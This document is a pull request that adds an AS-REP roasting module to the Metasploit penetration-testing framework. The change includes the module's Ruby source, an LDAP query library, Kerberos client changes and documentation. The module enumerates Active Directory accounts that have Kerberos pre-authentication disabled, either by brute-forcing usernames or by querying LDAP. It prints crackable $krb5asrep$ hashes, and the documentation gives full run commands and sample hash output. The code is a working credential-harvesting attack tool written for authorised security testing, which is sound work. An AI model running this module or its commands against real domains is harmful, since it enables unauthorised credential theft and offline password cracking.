### PR TITLE
Add a specific module to perform ASREP-roasts

### DIFF
--- a/documentation/modules/auxiliary/gather/asrep.md
+++ b/documentation/modules/auxiliary/gather/asrep.md
@@ -29,7 +29,7 @@ The Fully Qualified Domain Name (FQDN). Ex: mydomain.local.
 ### USER_FILE
 The file containing a list of usernames, each on a new line.
 
-### RHostname
+### Rhostname
 
 The hostname of the domain controller. Must be accurate otherwise the module will silently fail, even if users exist without pre-auth required.
 

--- a/documentation/modules/auxiliary/gather/asrep.md
+++ b/documentation/modules/auxiliary/gather/asrep.md
@@ -1,0 +1,74 @@
+## ASREP-roast
+
+The `auxiliary/gather/asrep` module can be used to find users who have Pre-authentication disabled,
+and retrieve credentials that can be cracked using a hash-cracking tool.
+
+The following ACTIONS are supported:
+
+- **BRUTE_FORCE**: Make TGT requests for all usernames in a given file. This does not require
+  valid domain credentials.
+- **LDAP**: Request the set of users with pre-authentication disabled using an LDAP query, and
+  then request TGTs for these users.
+
+## Module usage
+
+- Start `msfconsole`
+- Do: `use auxiliary/gather/asrep`
+- Do: `run action=BRUTE_FORCE user_file=<file> rhost=<IP> domain=<FQDN> rhostname=<hostname>`
+- The module will attempt to request TGTs for each of the users in the file. This should not lock out accounts.
+  A crackable value will be displayed for all identified accounts.
+- Do: `run action=LDAP rhost=<IP> username=<LDAP_User> password=<LDAP_Password> domain=<FQDN> rhostname=<hostname>`
+- The module will use LDAP to request the users without pre-auth required, and request TGTs for these users.
+  A crackable value will be displayed for all identified accounts.
+
+## Options
+
+### DOMAIN
+The Fully Qualified Domain Name (FQDN). Ex: mydomain.local.
+
+### USER_FILE
+The file containing a list of usernames, each on a new line.
+
+### RHostname
+
+The hostname of the domain controller. Must be accurate otherwise the module will silently fail, even if users exist without pre-auth required.
+
+### USE_RC4_HMAC
+Request a ticket with the lower-security, more easily crackable, RC4_HMAC encryption type. This is 
+usually preferable, but may be less stealthy.
+
+## Scenarios
+
+### Brute forcing users
+
+An example of brute forcing usernames, in the hope of finding one with pre-auth not required:
+
+```msf
+msf6 auxiliary(gather/asrep) > run action=BRUTE_FORCE user_file=/tmp/users.txt rhost=192.168.1.1 domain=msf.local rhostname=dc22
+[*] Running module against 192.168.1.1
+
+$krb5asrep$23$user@MSF.LOCAL:9fb9954fa32193185ab32e2de2ab9f13$bf14e834c661246cad302073c228e6ff7894cd3023665f0f84338432c3929922ae998c4a23bb9d163dda536a230d0503b2cf575389317b52bde782264940e80206a29e9613e47328228441cf013fb1f6672359f6799be97b962de9429e8859f437e53549be6b11ca07af6f09eae6cd78279af6d7f6dcdfd011eccb74b4aa753b2f9e6561c59c9408ee4bec983777908f3a7eef5fba977710e47e4e8ac0af10608a7dd23db506202b27d7892bc28426d2080c343edfe243bf1cae554cf6204733082332be2455e4674e1c3e84614818a6c15b54221dcaa832
+
+[*] Query returned 1 result.
+[*] Auxiliary module execution completed
+```
+
+### Using LDAP
+
+```
+msf6 auxiliary(gather/asrep) > run action=LDAP rhost=192.168.1.1 username=azureadmin password=password ldap::auth=kerberos domain=msf.local domaincontrollerrhost=192.168.1.1 rhostname=dc22
+[*] Running module against 192.168.1.1
+
+[+] 192.168.1.1:88 - Received a valid TGT-Response
+[*] 192.168.1.1:389 - TGT MIT Credential Cache ticket saved to /home/smash/.msf4/loot/20231124083018_default_192.168.1.1_mit.kerberos.cca_409871.bin
+[+] 192.168.1.1:88 - Received a valid TGS-Response
+[*] 192.168.1.1:389 - TGS MIT Credential Cache ticket saved to /home/smash/.msf4/loot/20231124083018_default_192.168.1.1_mit.kerberos.cca_923760.bin
+[+] 192.168.1.1:88 - Received a valid delegation TGS-Response
+[+] 192.168.1.1:389 Discovered base DN: DC=msf,DC=local
+[+] 192.168.1.1:389 Discovered schema DN: DC=msf,DC=local
+
+$krb5asrep$23$user@MSF.LOCAL:234e56b15bf3a0e3eb93d662ea6ded74$9889b0a449154c1353ea4db388af29381ad367771e2fe7d6a5644180e9f7ca0b1e836fc864f6d240e9ef91124edb13797dcb097f68c537279f80e3fc3c5c86f8f937af23bb2fd58274dd40ea184994cf31de50f508faac86c61749032b2d9e4ae4c74b0f76a0c242497e6765ddfba9c57743b19d4bb97aa3ef3b66cee50a1d3871b0b4ecd3f97d42781b6fb3d8839d8805ae1291d0e9ba07d374ed84ea39fadab548c2b40c87288b4465f234d0c3341e3b27c193a62a3ad7b0bdf04dbe5bf03815d48f766d1c727838f92dd36c437782975a978aefcb33e9
+
+[*] Query returned 1 result.
+[*] Auxiliary module execution completed
+```

--- a/lib/msf/core/exploit/remote/kerberos/client.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client.rb
@@ -134,7 +134,7 @@ module Msf
             res
           end
 
-          # Sends a kerberos AS request and reads the response
+          # Sends a kerberos TGS request and reads the response
           #
           # @param opts [Hash]
           # @return [Rex::Proto::Kerberos::Model::KdcResponse]
@@ -285,7 +285,9 @@ module Msf
               ),
             )
 
-            initial_as_res = send_request_as(req: initial_as_req)
+            req_opts = {req: initial_as_req}
+            req_opts.update(options)
+            initial_as_res = send_request_as(req_opts)
 
             # If we receive an AS_REP response immediately, no-preauthentication was required and we can return immediately
             if initial_as_res.msg_type == Rex::Proto::Kerberos::Model::AS_REP
@@ -365,7 +367,9 @@ module Msf
                 )
               )
 
-              preauth_as_res = send_request_as(req: preauth_as_req)
+              req_opts = {req: preauth_as_req}
+              req_opts.update(options)
+              preauth_as_res = send_request_as(req_opts)
 
               # If we've succeeded - break out of trying ciphers
               break if preauth_as_res.msg_type == Rex::Proto::Kerberos::Model::AS_REP

--- a/lib/msf/core/exploit/remote/ldap/queries.rb
+++ b/lib/msf/core/exploit/remote/ldap/queries.rb
@@ -1,0 +1,328 @@
+module Msf
+  ###
+  #
+  # This module exposes methods for querying a remote LDAP service
+  #
+  ###
+  module Exploit::Remote::LDAP
+    module Queries
+      def safe_load_queries(filename)
+        begin
+          settings = YAML.safe_load(File.binread(filename))
+        rescue StandardError => e
+          elog("Couldn't parse #{filename}", error: e)
+          return
+        end
+
+        return unless settings['queries'].is_a? Array
+
+        settings['queries']
+      end
+
+      def perform_ldap_query(ldap, filter, attributes, base, schema_dn, scope: nil)
+        results = []
+        perform_ldap_query_streaming(ldap, filter, attributes, base, schema_dn, scope: scope) do |result|
+          results << result
+        end
+
+        query_result_table = ldap.get_operation_result.table
+        validate_query_result!(query_result_table, filter)
+
+        if results.nil? || results.empty?
+          print_error("No results found for #{filter}.")
+          return nil
+        end
+
+        results
+      end
+
+      def perform_ldap_query_streaming(ldap, filter, attributes, base, schema_dn, scope: nil)
+        attribute_properties = query_attributes_data(ldap, attributes.map(&:to_sym), schema_dn)
+
+        scope ||= Net::LDAP::SearchScope_WholeSubtree
+        result_count = 0
+        ldap.search(base: base, filter: filter, attributes: attributes, scope: scope, return_result: false) do |result|
+          result_count += 1
+          yield result, attribute_properties if block_given?
+        end
+
+        result_count
+      end
+
+      def generate_rex_tables(entry, format)
+        tbl = Rex::Text::Table.new(
+          'Header' => entry[:dn][0].split(',').join(' '),
+          'Indent' => 1,
+          'Columns' => %w[Name Attributes]
+        )
+
+        entry.each_key do |attr|
+          if format == 'table'
+            tbl << [attr, entry[attr].join(' || ')] unless attr == :dn # Skip over DN entries for tables since DN information is shown in header.
+          else
+            tbl << [attr, entry[attr].join(' || ')] # DN information is not shown in CSV output as a header so keep DN entries in.
+          end
+        end
+
+        case format
+        when 'table'
+          print_line(tbl.to_s)
+        when 'csv'
+          print_line(tbl.to_csv)
+        else
+          fail_with(Failure::BadConfig, "Invalid format #{format} passed to generate_rex_tables!")
+        end
+      end
+
+      def convert_nt_timestamp_to_time_string(nt_timestamp)
+        Time.at((nt_timestamp.to_i - 116444736000000000) / 10000000).utc.to_s
+      end
+
+      def convert_pwd_age_to_time_string(timestamp)
+        seconds = (timestamp.to_i / -1) / 10000000 # Convert always negative number to positive then convert to seconds from tick count.
+        days = seconds / 86400
+        hours = (seconds % 86400) / 3600
+        minutes = ((seconds % 86400) % 3600) / 60
+        real_seconds = (((seconds % 86400) % 3600) % 60)
+        return "#{days}:#{hours.to_s.rjust(2, '0')}:#{minutes.to_s.rjust(2, '0')}:#{real_seconds.to_s.rjust(2, '0')}"
+      end
+
+      # Read in a DER formatted certificate file and transform it into a
+      # OpenSSL::X509::Certificate object before then using that object to
+      # read the properties of the certificate and return this info as a string.
+      def read_der_certificate_file(cert)
+        openssl_certificate = OpenSSL::X509::Certificate.new(cert)
+        version = openssl_certificate.version
+        subject = openssl_certificate.subject
+        issuer = openssl_certificate.issuer
+        algorithm = openssl_certificate.signature_algorithm
+        extensions = openssl_certificate.extensions.join(' | ')
+        extensions.strip!
+        extensions.gsub!(/ \|$/, '') # Strip whitespace and then strip trailing | from end of string.
+        [openssl_certificate, "Version: 0x#{version}, Subject: #{subject}, Issuer: #{issuer}, Signature Algorithm: #{algorithm}, Extensions: #{extensions}"]
+      end
+
+      # Taken from https://www.powershellgallery.com/packages/S.DS.P/2.1.3/Content/Transforms%5CsystemFlags.ps1
+      # and from https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1e38247d-8234-4273-9de3-bbf313548631
+      FLAG_DISALLOW_DELETE = 0x80000000
+      FLAG_CONFIG_ALLOW_RENAME = 0x40000000
+      FLAG_CONFIG_ALLOW_MOVE = 0x20000000
+      FLAG_CONFIG_ALLOW_LIMITED_MOVE = 0x10000000
+      FLAG_DOMAIN_DISALLOW_RENAME = 0x8000000
+      FLAG_DOMAIN_DISALLOW_MOVE = 0x4000000
+      FLAG_DISALLOW_MOVE_ON_DELETE = 0x2000000
+      FLAG_ATTR_IS_RDN = 0x20
+      FLAG_SCHEMA_BASE_OBJECT = 0x10
+      FLAG_ATTR_IS_OPERATIONAL = 0x8
+      FLAG_ATTR_IS_CONSTRUCTED = 0x4
+      FLAG_ATTR_REQ_PARTIAL_SET_MEMBER = 0x2
+      FLAG_NOT_REPLICATED = 0x1
+
+      def convert_system_flags_to_string(flags)
+        flags_converted = flags.to_i
+        flag_string = ''
+        flag_string << 'FLAG_DISALLOW_DELETE | ' if flags_converted & FLAG_DISALLOW_DELETE > 0
+        flag_string << 'FLAG_CONFIG_ALLOW_RENAME | ' if flags_converted & FLAG_CONFIG_ALLOW_RENAME > 0
+        flag_string << 'FLAG_CONFIG_ALLOW_MOVE | ' if flags_converted & FLAG_CONFIG_ALLOW_MOVE > 0
+        flag_string << 'FLAG_CONFIG_ALLOW_LIMITED_MOVE | ' if flags_converted & FLAG_CONFIG_ALLOW_LIMITED_MOVE > 0
+        flag_string << 'FLAG_DOMAIN_DISALLOW_RENAME | ' if flags_converted & FLAG_DOMAIN_DISALLOW_RENAME > 0
+        flag_string << 'FLAG_DOMAIN_DISALLOW_MOVE | ' if flags_converted & FLAG_DOMAIN_DISALLOW_MOVE > 0
+        flag_string << 'FLAG_DISALLOW_MOVE_ON_DELETE | ' if flags_converted & FLAG_DISALLOW_MOVE_ON_DELETE > 0
+        flag_string << 'FLAG_ATTR_IS_RDN | ' if flags_converted & FLAG_ATTR_IS_RDN > 0
+        flag_string << 'FLAG_SCHEMA_BASE_OBJECT | ' if flags_converted & FLAG_SCHEMA_BASE_OBJECT > 0
+        flag_string << 'FLAG_ATTR_IS_OPERATIONAL | ' if flags_converted & FLAG_ATTR_IS_OPERATIONAL > 0
+        flag_string << 'FLAG_ATTR_IS_CONSTRUCTED | ' if flags_converted & FLAG_ATTR_IS_CONSTRUCTED > 0
+        flag_string << 'FLAG_ATTR_REQ_PARTIAL_SET_MEMBER | ' if flags_converted & FLAG_ATTR_REQ_PARTIAL_SET_MEMBER > 0
+        flag_string << 'FLAG_NOT_REPLICATED | ' if flags_converted & FLAG_NOT_REPLICATED > 0
+        flag_string.strip.gsub!(/ \|$/, '')
+      end
+
+      def output_json_data(entry)
+        data = {}
+        entry.each_key do |attr|
+          data[attr] = entry[attr].length == 1 ? entry[attr][0] : entry[attr]
+        end
+        print_status(entry[:dn][0].split(',').join(' '))
+        print_line(JSON.pretty_generate(data))
+      end
+
+      def output_data_table(entry)
+        generate_rex_tables(entry, 'table')
+      end
+
+      def output_data_csv(entry)
+        generate_rex_tables(entry, 'csv')
+      end
+
+      def find_schema_dn(ldap, base)
+        results = ldap.search(attributes: ['objectCategory'], base: base, filter: '(objectClass=*)', scope: Net::LDAP::SearchScope_BaseObject)
+        validate_query_result!(ldap.get_operation_result.table)
+        if results.blank?
+          fail_with(Failure::UnexpectedReply, "LDAP server didn't respond to our request to find the root DN!")
+        end
+
+        # Double check that the entry has an instancetype attribute.
+        unless results[0].to_h.key?(:objectcategory)
+          fail_with(Failure::UnexpectedReply, "LDAP server didn't respond to the root DN request with the objectcategory attribute field!")
+        end
+
+        object_category_raw = results[0][:objectcategory][0]
+        schema_dn = object_category_raw.gsub(/CN=[A-Za-z0-9-]+,/, '')
+        print_good("#{peer} Discovered schema DN: #{schema_dn}")
+
+        schema_dn
+      end
+
+      def query_attributes_data(ldap, attributes, schema_dn)
+        attribute_properties = {}
+
+        filter = '(|'
+        attributes.each do |key|
+          next if attribute_properties.key?(key) # Skip if we already have this one
+          next if key == :dn # Skip DN as it will never have a schema entry
+
+          filter += "(LDAPDisplayName=#{key})"
+        end
+        filter += ')'
+        return unless filter.include?('LDAPDisplayName=')
+
+        attributes_data = ldap.search(base: ['CN=Schema,CN=Configuration', schema_dn].join(','), filter: filter, attributes: %i[LDAPDisplayName isSingleValued oMSyntax attributeSyntax])
+        query_result_table = ldap.get_operation_result.table
+        validate_query_result!(query_result_table)
+
+        attributes_data.each do |entry|
+          ldap_display_name = entry[:ldapdisplayname][0].to_s.downcase.to_sym
+          attribute_properties[ldap_display_name] = {
+            issinglevalued: entry[:issinglevalued][0] == 'TRUE',
+            omsyntax: entry[:omsyntax][0].to_i,
+            attributesyntax: entry[:attributesyntax][0]
+          }
+        end
+
+        attribute_properties
+      end
+
+      def normalize_entry(entry, attribute_properties)
+        # Convert to a hash so we get the raw data we need from within the Net::LDAP::Entry object
+        entry = entry.to_h
+        normalized_entry = { dn: entry[:dn] }
+        entry.each_key do |attribute_name|
+          next if attribute_name == :dn # Skip the DN case as there will be no attributes_properties entry for it.
+
+          normalized_attribute = entry[attribute_name].map { |v| Rex::Text.to_hex_ascii(v) }
+          attribute_property = attribute_properties[attribute_name]
+          unless attribute_property
+            normalized_entry[attribute_name] = normalized_attribute
+            next
+          end
+
+          case attribute_property[:omsyntax]
+          when 1 # Boolean
+            normalized_attribute[0] = entry[attribute_name][0] != 0
+          when 2 # Integer
+            if attribute_name == :systemflags
+              flags = entry[attribute_name][0]
+              converted_flags_string = convert_system_flags_to_string(flags)
+              normalized_attribute[0] = converted_flags_string
+            end
+          when 4 # OctetString or SID String
+            if attribute_property[:attributesyntax] == '2.5.5.17' # SID String
+              # Advice taken from https://ldapwiki.com/wiki/ObjectSID
+              object_sid_raw = entry[attribute_name][0]
+              begin
+                sid_data = Rex::Proto::MsDtyp::MsDtypSid.read(object_sid_raw)
+                sid_string = sid_data.to_s
+              rescue IOError => e
+                fail_with(Failure::UnexpectedReply, "Failed to read SID. Error was #{e.message}")
+              end
+              normalized_attribute[0] = sid_string
+            elsif attribute_property[:attributesyntax] == '2.5.5.10' # OctetString
+              if attribute_name.to_s.match(/guid$/i)
+                # Get the entry[attribute_name] object will be an array containing a single string entry,
+                # so reach in and extract that string, which will contain binary data.
+                bin_guid = entry[attribute_name][0]
+                if bin_guid.length == 16 # Length of binary data in bytes since this is what .length uses. In bits its 128 bits.
+                  begin
+                    decoded_guid = Rex::Proto::MsDtyp::MsDtypGuid.read(bin_guid)
+                    decoded_guid_string = decoded_guid.get
+                  rescue IOError => e
+                    fail_with(Failure::UnexpectedReply, "Failed to read GUID. Error was #{e.message}")
+                  end
+                  normalized_attribute[0] = decoded_guid_string
+                end
+              elsif attribute_name == :cacertificate || attribute_name == :usercertificate
+                normalized_attribute = entry[attribute_name].map do |raw_key_data|
+                  _certificate_file, read_data = read_der_certificate_file(raw_key_data)
+
+                  read_data
+                end
+              end
+            end
+          when 6 # String (Object-Identifier)
+          when 10 # Enumeration
+          when 18 # NumbericString
+          when 19 # PrintableString
+          when 20 # Case-Ignore String
+          when 22 # IA5String
+          when 23 # GeneralizedTime String (UTC-Time)
+          when 24 # GeneralizedTime String (GeneralizedTime)
+          when 27 # Case Sensitive String
+          when 64 # DirectoryString String(Unicode)
+          when 65 # LargeInteger
+            if attribute_name == :creationtime || attribute_name.to_s.match(/lastlog(?:on|off)/)
+              timestamp = entry[attribute_name][0]
+              time_string = convert_nt_timestamp_to_time_string(timestamp)
+            elsif attribute_name.to_s.match(/lockoutduration$/i) || attribute_name.to_s.match(/pwdage$/)
+              timestamp = entry[attribute_name][0]
+              time_string = convert_pwd_age_to_time_string(timestamp)
+            end
+            normalized_attribute[0] = time_string
+          when 66 # String (Nt Security Descriptor)
+          when 127 # Object
+          else
+            print_error("Unknown oMSyntax entry: #{attribute_property[:omsyntax]}")
+          end
+          normalized_entry[attribute_name] = normalized_attribute
+        end
+
+        normalized_entry
+      end
+
+      def show_output(entry, output_format)
+        case output_format
+        when 'csv'
+          output_data_csv(entry)
+        when 'table'
+          output_data_table(entry)
+        when 'json'
+          output_json_data(entry)
+        else
+          fail_with(Failure::BadConfig, 'Supported OUTPUT_FORMAT values are csv, table and json')
+        end
+      end
+
+      def run_queries_from_file(ldap, queries, base_dn, output_format)
+        queries.each do |query|
+          unless query['action'] && query['filter'] && query['attributes']
+            fail_with(Failure::BadConfig, "Each query in the query file must at least contain a 'action', 'filter' and 'attributes' attribute!")
+          end
+          attributes = query['attributes']
+          if attributes.nil? || attributes.empty?
+            print_warning('At least one attribute needs to be specified per query in the query file for entries to work!')
+            break
+          end
+          filter = Net::LDAP::Filter.construct(query['filter'])
+          print_status("Running #{query['action']}...")
+          query_base = query['base_dn_prefix'] ? [query['base_dn_prefix'], base_dn].join(',') : base_dn
+
+          result_count = perform_ldap_query_streaming(ldap, filter, attributes, query_base, schema_dn) do |result, attribute_properties|
+            show_output(normalize_entry(result, attribute_properties), output_format)
+          end
+
+          print_warning("Query #{query['filter']} from #{query['action']} didn't return any results!") if result_count == 0
+        end
+      end
+
+    end
+  end
+end

--- a/modules/auxiliary/gather/asrep.rb
+++ b/modules/auxiliary/gather/asrep.rb
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Auxiliary
         print_error('No users found without preauth required')
       else
         print_line
-        print_status("Query returned #{result_count} #{pluralize(result_count, 'result')}.")
+        print_status("Query returned #{result_count} #{'result'.pluralize(result_count)}.")
       end
     else
       fail_with(Msf::Module::Failure::BadConfig, 'User file not found')
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Auxiliary
         print_error("No entries could be found for #{filter_string}!")
       else
         print_line
-        print_status("Query returned #{result_count} result#{result_count == 1 ? '' : 's'}.")
+        print_status("Query returned #{result_count} #{'result'.pluralize(result_count)}.")
       end
     end
   end

--- a/modules/auxiliary/gather/asrep.rb
+++ b/modules/auxiliary/gather/asrep.rb
@@ -47,6 +47,11 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('RHostname', [ true, "The domain controller's hostname"], aliases: ['LDAP::Rhostname']),
       ]
     )
+    register_advanced_options(
+      [
+        OptEnum.new('LDAP::Auth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::NTLM, Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS]),
+      ]
+    )
 
     default_config_file_path = File.join(::Msf::Config.data_directory, 'auxiliary', 'gather', 'ldap_query', 'ldap_queries_default.yaml')
     loaded_queries = safe_load_queries(default_config_file_path) || []

--- a/modules/auxiliary/gather/asrep.rb
+++ b/modules/auxiliary/gather/asrep.rb
@@ -117,8 +117,8 @@ class MetasploitModule < Msf::Auxiliary
         username = result.samaccountname[0]
         begin
           roast(username)
-        rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError
-          print_error("#{username} reported as ASREP-roastable, but received error when attempting to retrieve TGT")
+        rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
+          print_error("#{username} reported as ASREP-roastable, but received error when attempting to retrieve TGT (#{e})")
         end
       end
       if result_count == 0

--- a/modules/auxiliary/gather/asrep.rb
+++ b/modules/auxiliary/gather/asrep.rb
@@ -77,19 +77,17 @@ class MetasploitModule < Msf::Auxiliary
     if user_file.present?
       File.open(user_file, 'rb') do |file|
         file.each_line(chomp: true) do |user_from_file|
-          begin
-            roast(user_from_file)
-            result_count += 1
-          rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError
-            # User either not present, or requires preauth
-          end
+          roast(user_from_file)
+          result_count += 1
+        rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError
+          # User either not present, or requires preauth
         end
       end
       if result_count == 0
         print_error('No users found without preauth required')
       else
         print_line
-        print_status("Query returned #{result_count} result#{result_count == 1 ? '' : 's'}.")
+        print_status("Query returned #{result_count} #{pluralize(result_count, 'result')}.")
       end
     else
       fail_with(Msf::Module::Failure::BadConfig, 'User file not found')
@@ -97,7 +95,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_ldap
-    fail_with(Msf::Module::Failure::BadConfig, 'Must provide a username for connecting to LDAP') if (datastore['USERNAME'].blank?)
+    fail_with(Msf::Module::Failure::BadConfig, 'Must provide a username for connecting to LDAP') if datastore['USERNAME'].blank?
 
     ldap_connect do |ldap|
       validate_bind_success!(ldap)

--- a/modules/auxiliary/gather/asrep.rb
+++ b/modules/auxiliary/gather/asrep.rb
@@ -1,0 +1,150 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Kerberos::Client
+  include Msf::Exploit::Remote::LDAP
+  include Msf::Exploit::Remote::LDAP::Queries
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Find Users Without Pre-Auth Required',
+        'Description' => %q{
+          This module searches for AD users without pre-auth required. Two different approaches
+          are provided:
+          - Brute force of usernames (does not require a user account; should not lock out accounts)
+          - LDAP lookup (requires an AD user account)
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'smashery', # MSF Module
+        ],
+        'References' => [
+          ['URL', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [],
+          'AKA' => ['preauth', 'asreproast']
+        },
+        'Actions' => [
+          ['BRUTE_FORCE', { 'Description' => 'Brute force to find susceptible user accounts' } ],
+          ['LDAP', { 'Description' => 'Ask a domain controller directly for the susceptible user accounts' } ],
+        ],
+        'DefaultAction' => 'BRUTE_FORCE'
+      )
+    )
+
+    register_options(
+      [
+        OptPath.new('USER_FILE', [ false, 'File containing usernames, one per line' ], conditions: %w[ACTION == BRUTE_FORCE]),
+        OptBool.new('USE_RC4_HMAC', [ true, 'Request using RC4 hash instead of default encryption types (faster to crack)', true]),
+        OptString.new('LDAP::Rhostname', [ true, "The LDAP server's hostname", true]),
+      ]
+    )
+
+    default_config_file_path = File.join(::Msf::Config.data_directory, 'auxiliary', 'gather', 'ldap_query', 'ldap_queries_default.yaml')
+    loaded_queries = safe_load_queries(default_config_file_path) || []
+    asrep_roast_query = loaded_queries.select { |entry| entry['action'] == 'ENUM_USER_ASREP_ROASTABLE' }
+    self.ldap_query = asrep_roast_query[0]
+  end
+
+  def run
+    case action.name
+    when 'BRUTE_FORCE'
+      run_brute
+    when 'LDAP'
+      run_ldap
+    end
+  end
+
+  def run_brute
+    result_count = 0
+    user_file = datastore['USER_FILE']
+    if user_file.present?
+      File.open(user_file, 'rb') do |user_fd|
+        user_fd.each_line do |user_from_file|
+          user_from_file.chomp!
+          begin
+            roast(user_from_file)
+            result_count += 1
+          rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError
+            # User either not present, or requires preauth
+          end
+        end
+      end
+      if result_count == 0
+        print_error("No entries could be found for #{filter_string}!")
+      else
+        print_line
+        print_status("Query returned #{result_count} result#{result_count == 1 ? '' : 's'}.")
+      end
+    else
+      print_error('User file is not present')
+    end
+  end
+
+  def run_ldap
+    ldap_connect do |ldap|
+      validate_bind_success!(ldap)
+      unless (base_dn = discover_base_dn(ldap))
+        fail_with(Failure::UnexpectedReply, "Couldn't discover base DN!")
+      end
+
+      schema_dn = find_schema_dn(ldap, base_dn)
+      filter_string = ldap_query['filter']
+      attributes = ldap_query['attributes']
+      begin
+        filter = Net::LDAP::Filter.construct(filter_string)
+      rescue StandardError => e
+        fail_with(Failure::BadConfig, "Could not compile the filter #{filter_string}. Error was #{e}")
+      end
+
+      print_line
+      result_count = perform_ldap_query_streaming(ldap, filter, attributes, base_dn, schema_dn) do |result, _attribute_properties|
+        username = result.samaccountname[0]
+        begin
+          roast(username)
+        rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError
+          print_error("#{username} reported as ASREP-roastable, but received error when attempting to retrieve TGT")
+        end
+      end
+      if result_count == 0
+        print_error("No entries could be found for #{filter_string}!")
+      else
+        print_line
+        print_status("Query returned #{result_count} result#{result_count == 1 ? '' : 's'}.")
+      end
+    end
+  end
+
+  def roast(username)
+    res = send_request_tgt(
+      server_name: datastore['LDAP::Rhostname'],
+      client_name: username,
+      realm: datastore['DOMAIN'],
+      offered_etypes: etypes,
+      rport: 88
+    )
+    hash = format_as_rep_to_john_hash(res.as_rep)
+    print_line(hash)
+  end
+
+  def etypes
+    if datastore['USE_RC4_HMAC']
+      [Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC]
+    else
+      # We could just ask for AES256, but we have an opportunity to be stealthier by asking for a normal set of etypes,
+      # and expecting to receive AES256. This assumption may be broken in the future if additional encryption types are added
+      Rex::Proto::Kerberos::Crypto::Encryption::DefaultOfferedEtypes
+    end
+  end
+
+  attr_accessor :ldap_query # The LDAP query for this module, loaded from a yaml file
+
+end


### PR DESCRIPTION
This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two different mechanisms:

- Brute force using a file full of usernames
- LDAP query to request the relevant usernames, followed by requesting TGTs

Both of these features existed within Metasploit (`kerberos_login` and `ldap_query`), but they weren't easily discoverable. 

I've forced the LDAP auth default to NTLM, since domain controllers don't accept the default plaintext auth method.

## Verification

- [x] Start `msfconsole`
- [x] `use asrep`
- [x] Create a file with a username of a user that is ASREP-roastable
- [x] `run action=BRUTE_FORCE user_file=<file> rhost=<rhost> domain=<domain> rhostname=<hostname>`
- [x] Verify that this finds the user, and displays a value that can be cracked by Hashcat
- [x] `run action=LDAP rhost=<host> username=<ldap username> password=<ldap password> ldap::auth=kerberos domain=<domain> domaincontrollerrhost=<domain ip> rhostname=<hostname>`
- [x] Verify that this finds all pre-auth-less users, and displays a value that can be cracked by Hashcat
- [x] Set `USE_RC4_HMAC` to false
- [x] Verify that it requests a ticket with the default etypes, and displays a `$18$` hash
